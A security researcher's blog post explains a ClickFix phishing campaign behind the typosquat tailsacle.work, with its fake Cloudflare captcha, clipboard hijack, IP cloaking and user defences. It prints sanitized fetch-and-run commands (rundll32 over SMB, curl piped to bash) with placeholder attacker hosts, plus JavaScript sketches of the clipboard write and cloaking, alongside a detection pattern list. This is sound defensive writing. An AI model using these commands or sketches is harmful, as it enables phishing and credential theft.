I travel constantly, and the lack of reliable remote access to my home network had finally caught up with me. Tailscale is the obvious answer, so between flights I searched for it to get it set up.
A result in the search page caught my eye — the domain looked almost right, but something was off.
tailsacle.work
Two letters swapped. The legitimate domain is tailscale.com. The TLD .work was the second tell — Tailscale doesn't have a public-facing presence on .work. A typosquat, showing up in Google search results for a major software product. That was curious enough to investigate.
Four days later I'd mapped a phishing operation that builds on techniques researchers have been tracking since 2023 — but applies them in a way that has real implications for defenders. The technical breakdown lives over on the NOC blog for threat researchers who want the full receipts. What I want to walk through here is the part that matters to a normal user: what the attack actually looks like on your screen, what it makes your computer do, and why it works.
What the user actually sees
What loaded looked like a Cloudflare bot-detection page. Familiar grey-on-white styling. "Performing security verification." A "Verify you are human" checkbox at the center. A "Ray ID" identifier at the bottom of the page and a "Performance and Security by Cloudflare" attribution line. The whole thing looks indistinguishable from a real Cloudflare interstitial because — as it turns out — most of it actually is a real Cloudflare interstitial. The attacker configured a Cloudflare account, pointed their typosquat domain at it, and uses Cloudflare's actual bot-mitigation product as part of the lure. The why of that gets covered in the NOC piece.
I clicked the checkbox. After a brief delay, a popup appeared in the middle of the page. On Windows, it said this:
Verification Steps
I am not a robot - reCAPTCHA Verification ID: 1468206
To better prove you are not a robot, please:
- Press & hold the Windows Key ⊞ + R.
- In the verification window, press Ctrl + V.
- Press Enter on your keyboard to finish.
You will then observe and agree:
"I am not a robot - reCAPTCHA Verification ID: 1468206"
On a Mac, the same page presents a slightly different version of the popup:
Verification Steps
I am not a robot - reCAPTCHA Verification ID: 1468206
To better prove you are not a robot, please:
- Open Terminal application on your Mac (you can find it in Applications → Utilities → Terminal).
- In the verification window, press Command + V.
- Press Enter on your keyboard to finish.
Both popups have a calm, professional, slightly-corporate aesthetic. Both reference a verification ID, which is a common pattern in real captcha systems and helps the page feel legitimate. Both give you three short steps that look like a procedure you've probably followed before in some other context. Both are designed to feel like the natural conclusion of a routine I-am-not-a-robot check.
What is on your clipboard
Here is what most users will not realize: the clipboard is not empty when they open the Run dialog. The page has already written something to it. The moment the verification checkbox is clicked, JavaScript silently replaces whatever is on the clipboard with a command. The popup that appears after is not instructing the user to verify themselves; it is instructing them to paste and execute the command the page just planted there.
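The mechanism takes only a few lines of browser JavaScript. Here is a minimal sketch of what the page-side logic plausibly looks like — not the actual kit's code; the element ID is hypothetical and the command is a sanitized placeholder:

```javascript
// Sketch (not the actual kit's code) of a ClickFix clipboard hijack.
// The browser Clipboard API only allows writes during a "user gesture",
// so the malicious write is wired directly to the checkbox click.
const LURE_COMMAND =
  'cmd /c "" start rundll32.exe \\\\<attacker-controlled-host>\\<token>\\<file>,rn';

async function onVerifyClick() {
  // Inside a click handler we are in a user gesture, so this succeeds.
  // Whatever the user had on the clipboard is silently replaced.
  await navigator.clipboard.writeText(LURE_COMMAND);
}

// Browser-only wiring; guarded so the sketch can be loaded anywhere.
if (typeof document !== 'undefined') {
  document
    .querySelector('#verify-checkbox') // hypothetical element ID
    ?.addEventListener('click', onVerifyClick);
}
```

No permission prompt appears for the write: clicking the checkbox is exactly the "user gesture" the Clipboard API requires.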
Pasting into a text editor instead of the Run dialog reveals what the clipboard actually contains.
On Windows, the clipboard held a command that looked roughly like this (sanitized to avoid serving as a recipe for harm):
cmd /c "" start rundll32.exe \\<attacker-controlled-host>\<token>\<file>,rn
What it does, if you let it run:
- cmd /c "" — opens a Windows command shell with an empty command (visually innocuous; runs silently)
- start rundll32.exe \\<host>\<token>\<file>,rn — tells Windows to download a file over SMB from the attacker's server and execute one of its functions in memory
The whole thing relies entirely on a legitimate, signed Microsoft utility called rundll32.exe. There is no malicious binary downloaded to disk. There is no obvious malware to flag. Windows is just doing what Windows is designed to do: load and run a DLL when asked.
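Commands in this shape are also a free source of indicators for defenders. Here is a small illustrative helper — hypothetical, not part of any real tooling — that extracts the attacker-controlled SMB host from such a lure so it can be blocked or reported:

```javascript
// Pull the UNC host out of a rundll32-over-SMB ClickFix command.
// Illustrative only; real triage tooling would normalize far more cases.
function extractSmbHost(command) {
  // Matches \\host\... and captures the host portion.
  const m = command.match(/\\\\([^\\\s"']+)\\/);
  return m ? m[1] : null;
}
```

Fed a real lure, this yields a domain or IP address you can block at the firewall or DNS layer.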
On Mac, the clipboard held something like this:
/bin/bash -c "$(curl -A 'Mac OS X 10_15_7' -fsSL '<attacker-host>/<unique-id>')"
Same idea, different syntax. Curl downloads a script from the attacker's server and pipes it directly into bash for execution.
What both of these payloads do once they run is the same: they harvest as much as they can from your machine as fast as they can. We're talking about things like browser-saved passwords, active session cookies (which bypass two-factor authentication entirely because the user is already logged in), cryptocurrency wallets and seed phrases, SSH keys, the .aws/credentials and .env files in any project folder, password manager vaults, and Slack/Discord/Telegram desktop session tokens. Smash-and-grab. Thirty to ninety seconds and gone.
If a user pastes that command into the Run dialog and presses Enter, their machine does all of that without any pop-up, any warning, any UAC prompt, anything. Windows just executes the legitimate signed utility. EDR products on the machine might or might not catch it; antivirus probably will not, because there is no malicious file — only a signed Microsoft tool being told to load a remote DLL. Most home users will not know anything happened until weeks later, when their crypto wallet gets drained, or their email account gets hijacked, or their employer's internal Slack starts receiving messages "from them."
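If you want a feel for how distinctive these payloads are, here is a crude, illustrative heuristic for flagging ClickFix-style clipboard contents. The patterns are drawn from publicly documented campaigns and are nowhere near exhaustive:

```javascript
// Toy ClickFix detector: does this clipboard text look like a lure?
// Illustrative patterns only; real detection belongs in EDR/DLP tooling.
const CLICKFIX_PATTERNS = [
  /rundll32(\.exe)?\s+\\\\/i,     // rundll32 loading a DLL over SMB
  /mshta\s+https?:/i,             // mshta pulling a remote HTA
  /powershell[^\n]*-enc/i,        // encoded PowerShell one-liner
  /curl[^\n|]*\|\s*(bash|sh)\b/i, // curl piped straight into a shell
  /\$\(curl[^)]*\)/,              // command substitution around curl
];

function looksLikeClickFix(clipboardText) {
  return CLICKFIX_PATTERNS.some((re) => re.test(clipboardText));
}
```

Both payloads shown above would trip this toy check; almost nothing a person legitimately copies would.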
This style of attack is called ClickFix. It has been the dominant malware-delivery technique online since late 2024, and it works for one specific reason: every part of the chain is built around the user's trust.
The trust chain
When you really break this down, there's no exploit involved. No zero-day. No malicious code running anywhere it shouldn't. Every component of the chain is legitimate, signed, and operating exactly as designed.
- Google ranked the site in its search results
- Cloudflare provided the TLS certificate, the bot-mitigation interstitial styling, and the hosting front-end
- Windows ran rundll32.exe because that's what rundll32.exe does when you tell it to
- macOS ran the bash script because that's what bash does
- The browser's Clipboard API let JavaScript write to the clipboard because the user clicked a checkbox, which counts as a "user gesture," which is exactly when the spec says clipboard writes are allowed
What got compromised was not any of those products. What got compromised was user trust, layered on top of each of them.
You trusted Google to surface the right Tailscale. You trusted the Cloudflare-styled interstitial to be Cloudflare. You trusted that "Verify you are human" meant what it has meant a thousand other times you've seen it. You trusted that an instruction popup wouldn't tell you to paste something dangerous. You trusted that the Run dialog or the Terminal were tools for you to use, not channels for an attacker to reach through your screen and into your operating system.
The attacker didn't break any of those trust relationships. They just borrowed credibility from each one. Six trust signals, none of them owned by the attacker, all stacked together to produce a moment of "this is normal, I should comply."
The attack chain depends on the user complying with all three steps. Most will. The instructions look routine, the context feels legitimate, and by the time the Run dialog is open the user is already committed to completing the process.
What I stumbled into
After the initial discovery, I spent four days pulling the campaign apart. What I found was not the work of a script kiddie.
The lure was a recent typosquat registered through a budget registrar. The Cloudflare-styled verification page is actually using a real Cloudflare product configured by the attacker — not a clone, the real thing, weaponized by setting up an account and pointing the typosquat domain at it. From a residential cellular connection, the page rendered the full malicious payload. From a Linode VPS in a US datacenter, the exact same URL with the exact same headers rendered an innocuous editorial article about networking products. Same URL, same minute, different IP reputation, completely different content. That's intentional. The actor knows every automated phishing scanner runs from datacenter IPs, so they show those scanners a clean decoy and show real users the actual lure.
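The cloaking decision itself is conceptually simple. Here is a hypothetical sketch of the per-request logic — the real kit's IP-reputation source is unknown to me, and the lookup table here is invented:

```javascript
// Hypothetical cloaking logic: scanners in datacenters see a decoy,
// residential visitors see the lure. The reputation map is invented.
function classifyVisitor(ip, reputationByPrefix) {
  const prefix = ip.split('.').slice(0, 2).join('.'); // crude /16 key
  return reputationByPrefix[prefix] ?? 'unknown';
}

function selectResponse(ip, reputationByPrefix) {
  const kind = classifyVisitor(ip, reputationByPrefix);
  // Anything that might be an automated scanner gets the clean page.
  if (kind === 'datacenter' || kind === 'unknown') {
    return 'decoy-article';
  }
  return 'fake-captcha'; // real users get the ClickFix lure
}
```

Note the default: when in doubt, serve the decoy. The attacker loses a few victims and in exchange stays invisible to every scanner that has not invested in residential egress.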
The actor rotates payload-hosting domains every few hours, registering new ones through whichever registrar has the slowest abuse desk. When one registrar started taking them down too quickly, they pivoted to another. Each rotation costs them about ten dollars and a few minutes of time. The asymmetry is structural and it favors the attacker.
And then I found something that made the investigation worth the time.
Most of the campaign's operational state — the per-victim authorization logic, the malicious code itself, the bookkeeping that lets the lure decide which visitors get the payload and which get redirected harmlessly — lives somewhere the defensive ecosystem almost never looks. The attacker doesn't run their command-and-control on a server you can take down. They run it somewhere public, free, and effectively immune to conventional takedowns.
I'm not going to explain where, here. The detail matters and the implications matter, and they deserve a proper technical treatment rather than a sentence in a user-facing post. But the short version is: this operator has built a phishing kit that uses a public blockchain as its persistence and authorization mechanism. Researchers at Guardio Labs, JUMPSEC, and Google/Mandiant have been tracking this class of technique since 2023. What this campaign adds is a per-victim IP authorization layer that has real implications for defenders — and it's been running uninterrupted for at least nine months across countless rotated typosquat domains. The technical write-up — with the full mechanism, the IOCs, the queries researchers can use to confirm victim compromise, and the prior research this builds on — is over on the NOC blog for anyone who works in threat intelligence or DFIR.
For everyone else: what matters is that this campaign isn't an outlier. It's representative of where phishing is going. The actors are getting more sophisticated, the infrastructure is getting more resilient, and the defensive tools that handled phishing five years ago are no longer sufficient.
What this means for normal people
You're not going to know any of the above when you sit down on a Sunday afternoon to install some software. You're going to search. You're going to click the top result. You're going to see something that looks like a Cloudflare captcha. You're going to do what it says. And by the time you realize anything is wrong, the actor has already approved your IP, your machine is harvesting your browser cookies and password manager and crypto wallets, and the data is being uploaded back to the attacker through an entirely legitimate-looking HTTPS connection.
What can a normal user do?
Stop and ask why. A verification page asking you to paste something into your operating system's command runner is not a normal thing. It is never a normal thing. Cloudflare doesn't ask you to do that. Google doesn't. Microsoft doesn't. Apple doesn't. If a site is asking you to paste something into Run or Terminal as part of "verification," you are being attacked. Close the tab. Don't paste it. Don't even paste it into a text editor to see what it is, unless you know what you're doing — even previewing the wrong thing in a clipboard inspector can give an attacker telemetry on the visitor.
Bookmark the real domains for software you use regularly. Search ranking is gamed by attackers constantly. Search results are not inherently safe, whether organic or paid. Tailscale, 1Password, Bitwarden, KeePass, your bank, your password manager, your email provider — bookmark them and use the bookmark. The few seconds you save by clicking the first search result is exactly the few seconds attackers depend on.
Run DNS-layer protection before the request hits your browser. This is the cheapest, highest-leverage piece of the defensive puzzle and most people don't have it. The way most modern phishing works, the attacker absolutely depends on your computer being able to resolve their fresh, dodgy typosquat domain. If your DNS resolver simply refuses to look up freshly-registered typosquat domains on suspicious TLDs, none of the rest of the attack chain ever gets a chance to fire. You never see the captcha. You never click the checkbox. You never get the popup. The attacker's infrastructure becomes irrelevant because the lookup fails at the front door. The architecture of how that works is over on CleanBrowsing's blog.
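To make that concrete, here is a toy version of the policy such a resolver can apply before your browser ever connects. The age threshold and TLD list are invented for illustration; real protective DNS services use live registration data and reputation feeds:

```javascript
// Toy protective-DNS policy. Thresholds and TLD list are illustrative.
const SUSPICIOUS_TLDS = new Set(['work', 'top', 'xyz', 'icu']);

function resolverVerdict(domain, registeredDaysAgo) {
  const tld = domain.split('.').pop();
  // Freshly registered domain on a low-reputation TLD: refuse to resolve.
  if (registeredDaysAgo < 30 && SUSPICIOUS_TLDS.has(tld)) {
    return 'NXDOMAIN'; // lookup fails, so the attack chain never starts
  }
  return 'RESOLVE';
}
```

Under this toy policy the typosquat never resolves, the fake captcha never loads, and the clipboard is never touched.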
The closing observation
A typosquat in Google search results for a major software brand. Every layer of the attack chain looks normal until the very last step. By the time a user gets to step 3 of the "verification," their hands are already moving.
Anyone can be in that position.
The campaign is still running as I write this. The actor is adapting in real time, registering new infrastructure within hours of the last batch getting taken down. They've been doing this for nine months. They will probably keep doing it for many more.
If you're in security or DFIR or threat intel, the technical write-up on NOC has the full breakdown — how this campaign builds on documented techniques like EtherHiding, the IOCs, the on-chain attribution evidence the actor accidentally left in public, and the detection guidance to find this in your own environment. If you're thinking about your organization's defensive architecture, the CleanBrowsing piece lays out the case for DNS-layer protection as the cheapest reliable intervention point against this whole class of attack.
For everyone else: stop and ask why. Bookmark the real domain. Run protective DNS. Don't paste things into Run dialogs.